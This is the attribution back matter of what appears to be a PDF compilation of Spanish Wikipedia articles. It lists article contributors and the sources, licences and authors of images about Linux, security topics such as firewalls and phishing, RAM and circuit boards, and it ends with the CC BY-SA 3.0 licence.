Mirkovich, Mokillo, Mommynotamushed, Moriel, Mrsebastoon, Muro de Aguas, Murphy era un optimista, Murven, Neurotronix, Ortisa, PACO, Pertile, Phirosiberia,Poco a poco, PyroMaker, Pólux, Queninosta, R0MAN0, Racso, Rafa3040, Raikkonen F1, Raystorm, Reypg87, Ricardogpn, Rigenea, SMP, Sanbec, Sauron, Savh, Sdepares, Seanver, SergioAndres Segovia, SergioN, Shooke, Snakefang, Sofiapx, SuperBraulio13, Superzerocool, Switcher6746, Tano4595, Technopat, Tomatejc, UA31, Vatelys, Vic Fede, Waka Waka, Whatsupchap,Wilfredor, Will vm, Xavimetal, Xenoforme, Xoneca, Xuankar, Yeza, Yvon ramirez, Érico Júnior Wouters, 534 ediciones anónimas

Circuito impreso  Fuente: http://es.wikipedia.org/w/index.php?oldid=67426381  Contribuyentes: .Sergio, ALEXAVIL, Alberto009 a, Alberto2010, Aweinstein, Banamex 5, Biasoli, Bostok I,Brayan Sneider, Bucephala, CORNUCOPIA, Canica, Cfede1984, Cinevoro, Cobalttempest, Damifb, DoN vErDuGo, Elliniká, Ezarate, FAR, Gaeddal, Ganímedes, GiraldoX, HUB, Helmy oved,Isha, Javierito92, Jgroeneveld, Jkbw, KAYK, Kordas, Kved, Laura Fiorucci, Leonpolanco, Lucien leGrey, Maldoror, Manuelt15, Manwë, Marvelshine, Matdrodes, Mcagliani, Mokillo, Moonkey,Mortadelo2005, Murphy era un optimista, NaSz, Nicop, Ortisa, Patricio Uribe M., Pccoronado, Petronas, Pólux, RuslanBer, Savh, Seluis, Snakeyes, Spirit-Black-Wikipedista, Thingg,Torquemado, Tostadora, Uny, Vic Fede, Xavimetal, Xoneca, Yrithinnd, Λεξικόφιλος, 228 ediciones anónimas

Page 146: Virus informático

Fuentes de imagen, Licencias y contribuyentes 144

Fuentes de imagen, Licencias y contribuyentesArchivo:Commons-logo.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Commons-logo.svg  Licencia: logo  Contribuyentes: SVG version was created by User:Grunt andcleaned up by 3247, based on the earlier PNG version, created by Reidab.Archivo:Cómo funciona el e-mail.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Cómo_funciona_el_e-mail.svg  Licencia: GNU Free Documentation License  Contribuyentes:Clemente, 1 ediciones anónimasArchivo:Houses.of.parliament.overall.arp.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Houses.of.parliament.overall.arp.jpg  Licencia: Public Domain  Contribuyentes:Arpingstone, Bhoeble, Common Good, Mtaylor848, Nichtbesserwisser, 1 ediciones anónimasArchivo:Arquitectura_linux.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Arquitectura_linux.png  Licencia: Creative Commons Attribution-Share Alike  Contribuyentes:GLUDArchivo:Linux_Distribution_Timeline.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Linux_Distribution_Timeline.svg  Licencia: desconocido  Contribuyentes: AndreasLundqvistImage:Debian 6.0.2.1.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Debian_6.0.2.1.png  Licencia: Creative Commons Attribution 3.0  Contribuyentes: MalgratdemarImage:Fedora_16_verne_Linux_Version.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Fedora_16_verne_Linux_Version.png  Licencia: desconocido  Contribuyentes:Proyecto Fedora (patrocinado por Red Hat)Image:Gentoo-10.0-livedvd.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Gentoo-10.0-livedvd.png  Licencia: GNU General Public License  Contribuyentes: Gentoo 10.0LiveDVD TeamImage:Mandriva2010gnomeone.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Mandriva2010gnomeone.png  Licencia: Creative Commons Attribution-Share Alike Contribuyentes: Carolingio93Image:OpenSUSE_12.1_KDE_desktop.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:OpenSUSE_12.1_KDE_desktop.png  Licencia: Creative CommonsAttribution-Sharealike 3.0  Contribuyentes: WiedemannImage:Slackware.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Slackware.png  Licencia: GNU General Public License  Contribuyentes: UploaderImage:Pantallazo_de_Ubuntu_11_10.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Pantallazo_de_Ubuntu_11_10.png  Licencia: GNU General Public License Contribuyentes: Canonical Ltd.Archivo:SabayonLinux-7-GNOME.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SabayonLinux-7-GNOME.png  Licencia: Creative Commons Attribution-Share Alike Contribuyentes: VARGUXImage:Pup-430.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Pup-430.png  Licencia: desconocido  Contribuyentes: Vishy1618Image:SLAX.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SLAX.png  Licencia: GNU General Public License  Contribuyentes: http://hacktolive.org/Image:Pclos20092.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Pclos20092.jpg  Licencia: GNU General Public License  Contribuyentes: PCLinuxOS Developer TeamImage:Canaima-desktop2.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Canaima-desktop2.png  Licencia: GNU General Public License  Contribuyentes: GuerrerocarlosImage:Joventux_3.0.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Joventux_3.0.png  Licencia: Creative Commons Attribution-Sharealike 3.0  Contribuyentes:User:YoansierraImage:Daxos-colibri.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Daxos-colibri.png  Licencia: Creative Commons Attribution-Sharealike 3.0  Contribuyentes: User:Davis150Archivo:servidor.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Servidor.jpg  Licencia: Creative Commons Attribution-Share Alike  Contribuyentes: Alberto Juarez EspinozaArchivo:Stachledraht DDos Attack.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Stachledraht_DDos_Attack.svg  Licencia: Creative Commons Attribution-Share Alike Contribuyentes: Everaldo Coelho and YellowIconArchivo:Anonymous Flag.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Anonymous_Flag.svg  Licencia: Public Domain  Contribuyentes: Allen4names, Anime Addict AA,AnonMoos, AnonymousLegion, Cycn, Dynamicwork, FredrikT, Hide-sp, Jcb, Kizar, Linfocito B, Ludger1961, Masur, Mattes, Necr0manzer, Plflcn, Rion, Simon Villeneuve, Tempest27,Trijnstel, Uweick, 6 ediciones anónimasArchivo:Anonymous at Scientology in Los Angeles.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Anonymous_at_Scientology_in_Los_Angeles.jpg  Licencia: CreativeCommons Attribution-Sharealike 2.0  Contribuyentes: Vincent DiamanteArchivo:Spanish Wikiquote.SVG  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Spanish_Wikiquote.SVG  Licencia: logo  Contribuyentes: James.mcd.nzArchivo:Wikinews-logo.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Wikinews-logo.svg  Licencia: logo  Contribuyentes: Vectorized by Simon 01:05, 2 August 2006 (UTC)Updated by Time3000 17 April 2007 to use official Wikinews colours and appear correctly on dark backgrounds. Originally uploaded by Simon.File:Firewall.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Firewall.png  Licencia: Creative Commons Attribution-Sharealike 3.0,2.5,2.0,1.0  Contribuyentes: Bruno PedrozoImage:Gufw 10.04.4.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Gufw_10.04.4.png  Licencia: GNU General Public License  Contribuyentes: BenIsaacs, KörnerbrötchenArchivo: Bastion host.JPG  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Bastion_host.JPG  Licencia: Creative Commons Zero  Contribuyentes: TitignsArchivo:Ubuntu Feisty Fawn Firestarter.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Ubuntu_Feisty_Fawn_Firestarter.png  Licencia: GNU Free Documentation License Contribuyentes: EmxArchivo:Yes_check.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Yes_check.svg  Licencia: Public Domain  Contribuyentes: SVG by Gregory Maxwell (modified by WarX)Archivo:Gufw-005.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Gufw-005.png  Licencia: GNU General Public License  Contribuyentes: AsturArchivo:X mark.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:X_mark.svg  Licencia: Public Domain  Contribuyentes: User:GmaxwellArchivo:Razor1911 JEDACID HQ.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Razor1911_JEDACID_HQ.jpg  Licencia: Attribution  Contribuyentes: JeD / ACiDArchivo:Wikibooks-logo.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Wikibooks-logo.svg  Licencia: logo  Contribuyentes: User:Bastique, User:Ramac et al.Archivo:H96566k.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:H96566k.jpg  Licencia: Public Domain  Contribuyentes: AVRS, Balcer, Circeus, Colfer2, Cwbm (commons),Dcoetzee, Editor at Large, Jatkins, Markhurd, Mr.freedoom, Para, Roo72, Waldir, 6 ediciones anónimasArchivo:Glider.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Glider.svg  Licencia: Public Domain  Contribuyentes: Eric S. RaymondFile:HappyHackingBicicleta.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:HappyHackingBicicleta.png  Licencia: Creative Commons Attribution-Sharealike 3.0 Contribuyentes: User:Omerta-veArchivo:PhishingTrustedBank.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:PhishingTrustedBank.png  Licencia: Public Domain  Contribuyentes: Andrew LevineArchivo:Phishing chart.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Phishing_chart.png  Licencia: Public domain  Contribuyentes: Original uploader was ZeWrestler aten.wikipediaArchivo:Firefox 2.0.0.1 Phising Alert.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Firefox_2.0.0.1_Phising_Alert.png  Licencia: Creative Commons Attribution-ShareAlike3.0 Unported  Contribuyentes: AVRS, KErosEnE, PolhoNinja, Remember the dot, 1 ediciones anónimasArchivo:Spammed-mail-folder.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Spammed-mail-folder.png  Licencia: GNU General Public License  Contribuyentes: Ascánder,Bawolff, Jfd34, KAMiKAZOW, LordT, Nixón, RJaguar3, 12 ediciones anónimasArchivo:SpamInACan.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SpamInACan.jpg  Licencia: Public Domain  Contribuyentes: USAFArchivo:Circle of spam.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Circle_of_spam.svg  Licencia: Creative Commons Attribution-ShareAlike 3.0 Unported  Contribuyentes:odderArchivo:No-spam.svg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:No-spam.svg  Licencia: Public Domain  Contribuyentes: IndolencesArchivo:Nuclear rat.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Nuclear_rat.png  Licencia: Public Domain  Contribuyentes: TrojaniestArchivo:Kingston KVR1333 IMGP5970 wp wp.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Kingston_KVR1333_IMGP5970_wp_wp.jpg  Licencia: GNU FreeDocumentation License  Contribuyentes: smial (talk)Archivo:Electronic Memory.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Electronic_Memory.jpg  Licencia: Creative Commons Attribution 2.0  Contribuyentes: SteveJurvetson from Menlo Park, USA

Page 147: Virus informático

Fuentes de imagen, Licencias y contribuyentes 145

Archivo:4mbramvax.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:4mbramvax.jpg  Licencia: GNU Free Documentation License  Contribuyentes: Poil 12:38, 21 May 2005(UTC)Archivo:SIPP-Modul.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SIPP-Modul.jpg  Licencia: Creative Commons Attribution-Sharealike 2.0  Contribuyentes: User Smial onde.wikipediaArchivo:SIMM-muistikampoja.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SIMM-muistikampoja.jpg  Licencia: GNU Free Documentation License  Contribuyentes: J-PKärnäArchivo:RamTypes.JPG  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:RamTypes.JPG  Licencia: Creative Commons Attribution 3.0  Contribuyentes: KB AlphaArchivo:Memoria RAM.JPG  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Memoria_RAM.JPG  Licencia: Public Domain  Contribuyentes: ChrihernArchivo:BGA RAM.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:BGA_RAM.jpg  Licencia: GNU Free Documentation License  Contribuyentes: User Smial on de.wikipediaArchivo:Motherboard diagram.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Motherboard_diagram.jpg  Licencia: GNU Free Documentation License  Contribuyentes:en:User:MoxfyreArchivo:jerarquia memoria.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Jerarquia_memoria.png  Licencia: Public Domain  Contribuyentes:ComputerMemoryHierarchy.png: User:Danlash at en.wikipedia.orgArchivo:Microchips.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Microchips.jpg  Licencia: desconocido  Contribuyentes: Original uploader was Zephyris at en.wikipediaArchivo:GeoffreyDummer.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:GeoffreyDummer.jpg  Licencia: Creative Commons Attribution-Sharealike 3.0  Contribuyentes:User:RjcukArchivo:PCB Spectrum.jpg  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:PCB_Spectrum.jpg  Licencia: Creative Commons Attribution-Sharealike 2.5  Contribuyentes: BillBertramArchivo:PCB design and realisation smt and through hole.png  Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:PCB_design_and_realisation_smt_and_through_hole.png  Licencia:Public Domain  Contribuyentes: User Mike1024

Page 148: Virus informático

Licencia 146

LicenciaCreative Commons Attribution-Share Alike 3.0 Unported//creativecommons.org/licenses/by-sa/3.0/